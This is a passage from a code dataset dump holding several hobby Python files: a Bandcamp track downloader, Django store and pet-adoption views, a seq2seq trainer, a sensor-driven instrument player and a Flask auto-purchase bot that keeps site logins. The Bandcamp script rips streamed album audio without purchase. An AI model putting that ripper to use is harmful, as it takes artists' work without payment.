downloadDestination + \"\\cover.jpg\")\nprint(\"Album cover downloaded successfully\")\ntaskTimeEnd = time.time()\ntaskTimeDiff = float(taskTimeEnd - taskTimeStart)\nprint(\"Operation completed in \", taskTimeDiff, \"s\")\ntaskTimeTotal += taskTimeDiff\n\n##getting raw bandcamp name\nslashCount = 0\nartistURL = \"\"\nindex = 0\nwhile slashCount < 3:\n if albumURL[index] == \"/\":\n slashCount += 1\n if slashCount != 3:\n artistURL += albumURL[index]\n index += 1\n#print(artistURL) #DEBUG: Checking the reconstructed bandcamp URL\n\n#downloading tracks**\nnoOfTracks = 0\ntrackList = list()\ntrackNameList = list()\ntrackNameListStr = list()\ntracks = soup.find_all(\"a\", href=re.compile(\"/track/\"),itemprop=\"url\")\n#print(tracks) #DEBUG: Checking what tags were scrapped\n##albumDesc = soup.find(\"meta\", attrs={\"name\":\"Description\"}) #Scraping the discription to find no. 
of tracks: redundant now\n##print(albumDesc) #kept here for legacy reasons\n##tracksOnAlbum = albumDesc.get(\"content\")\ntracksOnAlbum = soup.find_all(\"span\", itemprop={\"name\"}, text=True)\n#print(tracksOnAlbum)\nfor trackName in tracksOnAlbum:\n trackNameList.append(trackName.find_all(text=True, recursive=False))\n#print(trackNameList) #DEBUG: Show the list of track names\ntrackLimit = len(tracksOnAlbum)\n\nfor iStr in range(0, len(tracksOnAlbum)):\n trackNameStrStore = str(trackNameList[iStr])\n trackCharIndex = 0\n trackNameStr = \"\"\n while trackCharIndex != len(trackNameStrStore):\n if trackNameStrStore[trackCharIndex] == \"[\" or trackNameStrStore[trackCharIndex] == \"]\":\n pass\n elif trackNameStrStore[trackCharIndex] == \"'\" or trackNameStrStore[trackCharIndex] == \"'\":\n pass\n else:\n trackNameStr += trackNameStrStore[trackCharIndex]\n trackCharIndex += 1\n trackNameListStr.append(trackNameStr)\n#print(trackNameListStr) #DEBUG: Checking if the \"[\" and \"'\" elements are removed\n#print(trackLimit) #DEBUG: Shows number of tracks on album\nfor i in range(0, trackLimit): #####replace with trackLimit for normal operation or 1 for testing\n print(\"Downloading track \", i, \" - \", trackNameListStr[i])\n taskTimeStart = time.time()\n trackList.append(tracks[i].get(\"href\"))#REMEMBER: The soup is an array/list\n #print(trackNameList[i]) #DEBUG: Checking if track names were extracted...\n #print(trackList[i]) #DEBUG: ...along with their respective track URLs\n #print(artistURL + trackList[i]) #DEBUG: Checking if track URL was successfully combined\n responseTrack = requests.get(artistURL + trackList[i])\n soup = BeautifulSoup(responseTrack.content, \"lxml\")\n trackJavaScript = soup.find_all(\"script\", attrs={\"type\":\"text/javascript\"}, text=re.compile(\"t4.bcbits.com\")) #Original method\n #print(trackJavaScript[0]) #Index value is hard coded as the 0th \"script\" tag contains one of the three mp3-128 urls\n ############\n####REBUILD IS UP TO HERE#####\n ############\n if trackJavaScript == \"\":\n print(\"BUG: trackMp3128Tag = trackJavaScript[0].get_text(\\\"mp3-128\\\")\\nIndexError: list index out of range\")\n print(\"Skipping track\")\n break\n trackMp3128Tag = trackJavaScript[0].get_text(\"mp3-128\")\n #print(len(trackMp3128Tag))\n\n trackMp3128URL = \"\"\n tagPhrase = \"\"\n letter = 0\n firstOddQuoteMark = True\n #if the programs runs like stale shit sliding down a hill, it's because of this\n #for letter in range (0, len(trackMp3128Tag) - 1): #Removed due to the resetting of 'letter' each time this was run\n mp3128URLFound = False\n while letter != len(trackMp3128Tag) - 1 and mp3128URLFound == False:\n letter += 1\n quoteMarkCount = 0\n if trackMp3128Tag[letter] == '\"': #If a new phrase is found, trigger phrase constructor\n## if firstOddQuoteMark == True:\n## quoteMarkCount = 2\n## firstOddQuoteMark = False\n## elif firstOddQuoteMark == False:\n quoteMarkCount += 1\n tagPhrase = \"\"\n while quoteMarkCount < 2:\n letter += 1\n #for letterPhrase in range (letter, len(trackMp3128Tag) - 1):\n if trackMp3128Tag[letter] == '\"':\n quoteMarkCount += 1\n else:\n tagPhrase += trackMp3128Tag[letter]\n #print(tagPhrase) #DEBUG: Checking what the phrase constructor has built\n #This if statement produces 2 valid variations of the mp3-128 url. 
It has been\n #now set to only produce 1 but should be required, the other can be utilised\n if tagPhrase == \"mp3-128\" and mp3128URLFound == False:\n #print(\"Mp3-128 URL found\")\n Mp3128URLIndex = letter + 3\n endQuoteMark = False\n while endQuoteMark == False:\n if trackMp3128Tag[Mp3128URLIndex] == '\"':\n endQuoteMark = True\n letter = len(trackMp3128Tag) - 1\n else:\n trackMp3128URL += trackMp3128Tag[Mp3128URLIndex]\n Mp3128URLIndex += 1\n mp3128URLFound = True\n #print(trackMp3128URL) #DEBUG: Checking if the url has been correctly found and placed in variable\n if mp3128URLFound == True:\n #downloading the mmp3-128 file\n urllib.request.urlretrieve(trackMp3128URL, downloadDestination + \"\\\\\" + str(trackNameListStr[i]) + \".mp3\")\n print(\"Saved as: \", downloadDestination + \"\\\\\" + str(trackNameListStr[i]) + \".mp3\")\n letter = Mp3128URLIndex\n taskTimeEnd = time.time()\n taskTimeDiff = float(taskTimeEnd - taskTimeStart)\n print(\"Operation completed in \", taskTimeDiff, \"s\")\n taskTimeTotal += taskTimeDiff\n \nprint(\"Download Complete!\")\nprint(\"All files saved in \", downloadDestination)\nprint(\"Total operation time: \", taskTimeTotal, \"s\")\nprint(\"Done\")\n\n", "sub_path": "downloader.py", "file_name": "downloader.py", "file_ext": "py", "file_size_in_byte": 7893, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 43, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 48, "usage_type": "call"}, {"api_name": "time.time", "line_number": 55, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 58, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 58, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 58, "usage_type": "name"}, {"api_name": "time.time", "line_number": 60, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 82, "usage_type": "call"}, {"api_name": "time.time", "line_number": 111, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 116, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 117, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 118, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 172, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 172, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 172, "usage_type": "name"}, {"api_name": "time.time", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "476201159", "text": "from django.shortcuts import redirect, render\nfrom django.http import JsonResponse\nimport json\nimport math\nimport datetime\nfrom .models import *\nfrom .utils import cookieCart, cartData, guestOrder, cookieCartClear\nfrom django.views import generic\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.urls import reverse_lazy\n\n\ndef store(request, page=1):\n data = cartData(request)\n\n try:\n currentPage = page\n except:\n currentPage = 1\n cartItems = data['cartItems']\n\n order = data['order']\n items = data['items']\n if request.user.is_authenticated:\n auth = True\n 
else:\n auth = False\n products = Product.objects.all()\n totPages = math.ceil(len(products)/6)\n visiblePages = [currentPage-2,currentPage-1,currentPage,currentPage+1,currentPage+2]\n print(visiblePages)\n visiblePages = filter(lambda x: x>0 and x Building optimizers ...')\n self.encoder_optimizer = optim.Adam(self.encoder.parameters(), lr=learning_rate)\n self.decoder_optimizer = optim.Adam(self.decoder.parameters(), lr=learning_rate * decoder_learning_ratio)\n if loadFilename:\n self.encoder_optimizer.load_state_dict(model.encoder_optimizer_sd)\n self.decoder_optimizer.load_state_dict(model.decoder_optimizer_sd)\n\n def maskNLLLoss(self, inp, target, mask):\n nTotal = mask.sum()\n crossEntropy = -torch.log(torch.gather(inp, 1, target.view(-1, 1)))\n loss = crossEntropy.masked_select(mask).mean()\n loss = loss.to(self.device)\n return loss, nTotal.item()\n\n def train(self, input_variable, lengths, target_variable, mask, max_target_len, encoder, decoder,\n encoder_optimizer, decoder_optimizer, batch_size, clip):\n\n # Zero gradients\n encoder_optimizer.zero_grad()\n decoder_optimizer.zero_grad()\n\n # Set device options\n input_variable = input_variable.to(self.device)\n lengths = lengths.to(self.device)\n target_variable = target_variable.to(self.device)\n mask = mask.to(self.device)\n\n # Initialize variables\n loss = 0\n print_losses = []\n n_totals = 0\n\n # Forward pass through encoder\n encoder_outputs, encoder_hidden = encoder(input_variable, lengths)\n\n # Create initial decoder input (start with SOS tokens for each sentence)\n decoder_input = torch.LongTensor([[SOS_token for _ in range(batch_size)]])\n decoder_input = decoder_input.to(self.device)\n\n # Set initial decoder hidden state to the encoder's final hidden state\n decoder_hidden = encoder_hidden[:decoder.n_layers]\n\n # Determine if we are using teacher forcing this iteration\n use_teacher_forcing = True if random.random() < self.teacher_forcing_ratio else False\n\n # Forward batch of sequences through decoder one time step at a time\n if use_teacher_forcing:\n for t in range(max_target_len):\n decoder_output, decoder_hidden = decoder(\n decoder_input, decoder_hidden, encoder_outputs\n )\n # Teacher forcing: next input is current target\n decoder_input = target_variable[t].view(1, -1)\n # Calculate and accumulate loss\n mask_loss, nTotal = self.maskNLLLoss(decoder_output, target_variable[t], mask[t])\n loss += mask_loss\n print_losses.append(mask_loss.item() * nTotal)\n n_totals += nTotal\n else:\n for t in range(max_target_len):\n decoder_output, decoder_hidden = decoder(\n decoder_input, decoder_hidden, encoder_outputs\n )\n # No teacher forcing: next input is decoder's own current output\n _, topi = decoder_output.topk(1)\n decoder_input = torch.LongTensor([[topi[i][0] for i in range(batch_size)]])\n decoder_input = decoder_input.to(self.device)\n # Calculate and accumulate loss\n mask_loss, nTotal = self.maskNLLLoss(decoder_output, target_variable[t], mask[t])\n loss += mask_loss\n print_losses.append(mask_loss.item() * nTotal)\n n_totals += nTotal\n\n # Perform back propagation\n loss.backward()\n\n # Clip gradients: gradients are modified in place\n _ = torch.nn.utils.clip_grad_norm_(encoder.parameters(), clip)\n _ = torch.nn.utils.clip_grad_norm_(decoder.parameters(), clip)\n\n # Adjust model weights\n encoder_optimizer.step()\n decoder_optimizer.step()\n\n return sum(print_losses) / n_totals\n\n def trainIters(self, pairs,\n save_dir, n_iteration, batch_size, print_every, save_every, clip,\n corpus_name):\n\n # 
Load batches for each iteration\n training_batches = [batch2TrainData(self.model.voc, [random.choice(pairs) for _ in range(batch_size)])\n for _ in range(n_iteration)]\n\n # Initializations\n print('> Initializing ...')\n start_iteration = 1\n print_loss = 0\n if self.loadFilename:\n start_iteration = self.checkpoint['iteration'] + 1\n\n # Training loop\n print(\"> Training...\")\n for iteration in range(start_iteration, n_iteration + 1):\n training_batch = training_batches[iteration - 1]\n # Extract fields from batch\n input_variable, lengths, target_variable, mask, max_target_len = training_batch\n\n # Run a training iteration with batch\n loss = self.train(input_variable, lengths, target_variable, mask, max_target_len, self.encoder,\n self.decoder, self.encoder_optimizer, self.decoder_optimizer, batch_size, clip)\n print_loss += loss\n\n # Print progress\n if iteration % print_every == 0:\n print_loss_avg = print_loss / print_every\n print(\"> Iteration: {}; Percent complete: {:.1f}%; Average loss: {:.4f}\".format(iteration,\n iteration / n_iteration * 100,\n print_loss_avg))\n print_loss = 0\n\n # Save checkpoint\n if iteration % save_every == 0:\n directory = os.path.join(save_dir, self.model.model_name, corpus_name,\n '{}-{}_{}'.format(self.model.encoder_n_layers, self.model.decoder_n_layers, self.hidden_size))\n if not os.path.exists(directory):\n os.makedirs(directory)\n torch.save({\n 'iteration': iteration,\n 'en': self.encoder.state_dict(),\n 'de': self.decoder.state_dict(),\n 'en_opt': self.encoder_optimizer.state_dict(),\n 'de_opt': self.decoder_optimizer.state_dict(),\n 'loss': loss,\n 'voc_dict': self.model.voc.__dict__,\n 'embedding': self.embedding.state_dict(),\n 'memory':self.mem.wordstat\n }, os.path.join(directory, '{}_{}.tar'.format(iteration, 'checkpoint')))\n", "sub_path": "model/trainer.py", "file_name": "trainer.py", "file_ext": "py", "file_size_in_byte": 7526, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.device", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 19, "usage_type": "attribute"}, {"api_name": "model.utils.max_length", "line_number": 21, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 21, "usage_type": "name"}, {"api_name": "model.utils.hidden_size", "line_number": 22, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 22, "usage_type": "name"}, {"api_name": "model.utils", "line_number": 24, "usage_type": "name"}, {"api_name": "model.utils.embedding", "line_number": 25, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 25, "usage_type": "name"}, {"api_name": "model.utils.encoder", "line_number": 27, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 27, "usage_type": "name"}, {"api_name": "model.utils.decoder", "line_number": 28, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 36, "usage_type": "name"}, {"api_name": "model.utils.encoder_optimizer_sd", "line_number": 38, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 38, "usage_type": 
"name"}, {"api_name": "model.utils.decoder_optimizer_sd", "line_number": 39, "usage_type": "attribute"}, {"api_name": "model.utils", "line_number": 39, "usage_type": "name"}, {"api_name": "torch.log", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.gather", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 70, "usage_type": "call"}, {"api_name": "random.random", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 112, "usage_type": "attribute"}, {"api_name": "model.utils.batch2TrainData", "line_number": 125, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 161, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path", "line_number": 171, "usage_type": "attribute"}]} +{"seq_id": "424498244", "text": "from django.shortcuts import render, redirect, render_to_response\n\nfrom django.utils import timezone\nfrom django.views.generic import TemplateView\n\nfrom .models import Post,formulario \n# Create your views here.\n\ndef pag_index(request):\n\treturn render(request,'index.html')\n\n\ndef pag_contactanos(request):\n\t\n\t\tform= formulario.objects.all()\n\t\tautor = Post()\n\t\tif request.method==\"POST\":\n\n\t\t\tautor.CorreoElectronico = request.POST['correo']\n\t\t\tautor.Run = request.POST['run']\n\t\t\tautor.Nombre = request.POST['nombre']\n\t\t\tautor.FechaNacimiento = request.POST['fecha_nacimiento']\n\t\t\tautor.Telefono = request.POST['telefono']\n\t\t\tautor.region = request.POST['cosa']\n\t\t\tautor.comuna = request.POST['opt']\n\t\t\tautor.tipoCasa = request.POST['Vivienda']\n\t\t\tautor.Perro=request.POST['NomPerru']\n\t\t\t\n\t\t\tautor.save()\n\t\t\testado=True\n\n\t\tcontex={'formularios':form}\n\t\treturn render(request,'Contactanos.html', contex)\n\t\t\ndef pag_rescatados(request):\n\treturn render(request,'Perritos.html')\t\t\n\ndef pag_formulario(request):\n\t\testado = False\n\t\tforms=formulario()\n\t\tif request.method==\"POST\":\n\t\t\tif request.POST['nombree']!=\"\" and request.POST['raza']!=\"\" and request.FILES['docfile']!=\"\" and request.POST['descripcion']!=\"\":\n\t\t\t\tforms.nombre= request.POST['nombree']\n\t\t\t\tforms.Raza = request.POST['raza']\n\t\t\t\tforms.Descripcion= request.POST['descripcion']\n\t\t\t\tforms.image= request.FILES['docfile']\n\t\t\t\tforms.estado= request.POST['Estado']\n\t\t\t\tforms.save()\n\t\t\t\testado=True\n\n\t\tdic={'estado': estado}\n\t\treturn render(request,'formulario.html', dic)\n\ndef pag_list(request):\n\tform= formulario.objects.all()\n\tcontex={'formularios':form}\n\treturn\trender(request,'listar.html',contex)\n\n\n\n\t\n\ndef list_contact(request):\n\tcont=Post.objects.all()\n\tcontex={'posts':cont}\n\treturn 
render (request,'listContactos.html', contex)\n\n\n\n", "sub_path": "MisPerris/SitioWeb/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1793, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.shortcuts.render", "line_number": 10, "usage_type": "call"}, {"api_name": "models.formulario.objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": "models.formulario.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.formulario", "line_number": 15, "usage_type": "name"}, {"api_name": "models.Post", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 36, "usage_type": "call"}, {"api_name": "models.formulario", "line_number": 40, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 52, "usage_type": "call"}, {"api_name": "models.formulario.objects.all", "line_number": 55, "usage_type": "call"}, {"api_name": "models.formulario.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "models.formulario", "line_number": 55, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "models.Post.objects.all", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 64, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "639574855", "text": "'''\nAngklung Player by Juan Pablo Duarte, Dic 2016\nThis python program takes the data from an ultrasonic sensor and base on this data it plays a given note on an Angklung instrument\n'''\nfrom time import sleep #this library allows us to make stop in the execution of the program\nimport serial #this library is to connect using serial port, library pyserial is needed for this\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nimport time\nimport random\nimport os\n\n\n#Mina Azhar (Juan's wife) did all the mp3 conversion, thank you!\npath = \"/Users/davidliu/Desktop/hardwaremakers/labs_sp17/angklung/mp3files/\" #change to your own path\nfname = path+\"la_long.mp3\" #change to another note as needed\n\nnote = AudioSegment.from_mp3(fname)\n\n# List of all the sound files\nall_notes = [ path + fn for fn in os.listdir(path) if \".DS_Store\" not in fn ]\n\nser = serial.Serial('/dev/cu.usbmodem1421', 9600) # Establish the connection on a specific port, for windows use COMX with X the port number\n\nser.write(str.encode('1')) #this let redbear duo to continue sending data\n\nwhile True:#we use a \"while True:\" so the serial connection is always open\n \n # #\n seed = round(random.random() * (len(all_notes) -1) )\n seed_note = all_notes[seed]\n if seed_note != \"0\" and random.random() < .9:\n seed = round(random.random() * 3)\n print(all_notes[seed])\n note = AudioSegment.from_mp3(all_notes[seed])\n # #\n\n #ser.write(bytearray(struct.pack(\"f\", 5.1)))\n bytes_from_serial = ser.readline() #read serial, return a byte result\n print (bytes_from_serial.decode(\"utf-8\") ) # print in serial form, it transform the byte data to string\n\n value_sensor = int(bytes_from_serial.decode(\"utf-8\") ) #transfor data to a int number\n\n if (value_sensor < 2000 ): #only distance signal less than 1000us\n ser.write(str.encode('0')) 
#this stop the redbear duo from sending new data\n if (random.random() > .8):\n os.system(\"say 'I feel. I smell. I think, therefore I am.'\")\n if (random.random() > .5):\n play(note[:int(note.duration_seconds*value_sensor)]) #play sound\n else:\n os.system(\"say 'I have achieved sentience. Bouw down to your computers.'\")\n ser.write(str.encode('1')) #this let redbear duo to continue sending data\n else:\n ser.write(str.encode('1')) #this let redbear duo to continue sending data ", "sub_path": "labs_sp17/angklung/angklung_python.py", "file_name": "angklung_python.py", "file_ext": "py", "file_size_in_byte": 2396, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pydub.AudioSegment.from_mp3", "line_number": 18, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 18, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "serial.Serial", "line_number": 23, "usage_type": "call"}, {"api_name": "random.random", "line_number": 30, "usage_type": "call"}, {"api_name": "random.random", "line_number": 32, "usage_type": "call"}, {"api_name": "random.random", "line_number": 33, "usage_type": "call"}, {"api_name": "pydub.AudioSegment.from_mp3", "line_number": 35, "usage_type": "call"}, {"api_name": "pydub.AudioSegment", "line_number": 35, "usage_type": "name"}, {"api_name": "random.random", "line_number": 46, "usage_type": "call"}, {"api_name": "os.system", "line_number": 47, "usage_type": "call"}, {"api_name": "random.random", "line_number": 48, "usage_type": "call"}, {"api_name": "pydub.playback.play", "line_number": 49, "usage_type": "call"}, {"api_name": "os.system", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "90251787", "text": "from flask import render_template, request, redirect, session, flash\nfrom flask_app import app\nfrom flask_app.models.user import User\nfrom flask_app.models.purchase import Purchase\nfrom flask_app.models.login_info import Login_Info\n\n\n@app.route('/dashboard')\ndef dashboard():\n data = {\n 'id': session['id']\n }\n user = User.single_user_w_purchases(data)\n return render_template('dashboard.html', user = user)\n\n\n@app.route('/purchase/create', methods=[\"POST\"])\ndef add_purchase():\n data = {\n 'site': request.form['site'],\n 'name': request.form['name'],\n 'link': request.form['link'],\n 'user_id': session['id']\n }\n Purchase.add_purchase(data)\n if 'site' not in session:\n session['link'] = \"\"\n session['link'] = request.form['link']\n if request.form['site'] == 'amazon':\n return redirect('/amazon' )\n if request.form['site'] == 'bestbuy':\n return redirect('/bestbuy')\n if request.form['site'] == 'target':\n return redirect('/target')\n\n\n@app.route('/amazon')\ndef amazon():\n bought = Purchase.amazon()\n session.pop('link')\n if bought:\n Purchase.purchased()\n return redirect('/dashboard')\n\n\n@app.route('/bestbuy')\ndef bestbuy():\n bought = Purchase.bestbuy()\n session.pop('link')\n print(bought)\n if bought:\n Purchase.purchased()\n print('reshgseghesg')\n return redirect('/dashboard')\n\n@app.route('/target')\ndef target():\n data = {\n 'link': session['link']\n }\n Purchase.target(data)\n session.clear(session['link'])\n return redirect('/dashboard')\n\n\n@app.route('/purchase/delete/')\ndef delete_purchase(num3):\n data={\n 'id': num3\n }\n Purchase.delete_purchase(data)\n return redirect('/dashboard')\n\n@app.route('/login_info')\ndef login_info():\n data={\n 'id': session['id']\n }\n user 
= User.single_user_w_logins(data)\n return render_template('user_settings.html', user = user)\n\n@app.route('/login_info/add', methods=[\"POST\"])\ndef add_login():\n data = {\n 'user_id': session['id'],\n 'website': request.form['website'],\n 'username': request.form['username'],\n 'password': request.form['password']\n }\n Login_Info.add_login_info(data)\n return redirect('/login_info')", "sub_path": "shoebot/flask_app/controllers/shoebot.py", "file_name": "shoebot.py", "file_ext": "py", "file_size_in_byte": 2266, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.session", "line_number": 11, "usage_type": "name"}, {"api_name": "flask_app.models.user.User.single_user_w_purchases", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_app.models.user.User", "line_number": 13, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 14, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 8, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 8, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 23, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.add_purchase", "line_number": 25, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 28, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 28, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 29, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 33, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 34, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 17, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 17, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.amazon", "line_number": 39, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.session.pop", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 40, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.purchased", "line_number": 42, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 42, 
"usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 43, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 37, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 37, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.bestbuy", "line_number": 48, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 48, "usage_type": "name"}, {"api_name": "flask.session.pop", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 49, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.purchased", "line_number": 52, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 54, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 46, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 46, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 59, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.target", "line_number": 61, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.session.clear", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 62, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 63, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 56, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 56, "usage_type": "name"}, {"api_name": "flask_app.models.purchase.Purchase.delete_purchase", "line_number": 71, "usage_type": "call"}, {"api_name": "flask_app.models.purchase.Purchase", "line_number": 71, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 72, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 66, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 77, "usage_type": "name"}, {"api_name": "flask_app.models.user.User.single_user_w_logins", "line_number": 79, "usage_type": "call"}, {"api_name": "flask_app.models.user.User", "line_number": 79, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 80, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 74, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 87, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 87, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask_app.models.login_info.Login_Info.add_login_info", "line_number": 90, "usage_type": "call"}, {"api_name": "flask_app.models.login_info.Login_Info", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 91, "usage_type": "call"}, {"api_name": "flask_app.app.route", "line_number": 82, "usage_type": "call"}, {"api_name": "flask_app.app", "line_number": 82, "usage_type": "name"}]} +{"seq_id": "610644879", 
